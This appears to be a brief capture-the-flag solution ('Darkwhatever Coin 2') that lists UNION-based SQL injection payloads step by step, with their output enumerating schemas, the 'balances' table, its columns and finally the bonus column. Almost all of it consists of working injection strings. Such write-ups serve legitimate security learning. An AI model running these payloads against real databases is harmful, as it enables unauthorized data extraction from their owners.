Darkwhatever Coin 2

  1. Schema names
' UNION SELECT SCHEMA_NAME, NULL FROM information_schema.schemata #
information_schema
q2
  1. Table names
' UNION SELECT TABLE_NAME, NULL FROM information_schema.tables WHERE TABLE_SCHEMA = 'q2' #
balances
  1. Column names
' UNION SELECT COLUMN_NAME, NULL FROM information_schema.columns WHERE TABLE_SCHEMA = 'q2' #
id
teamname
balance
bonus
  1. Bonus column
' UNION SELECT NULL, bonus FROM balances #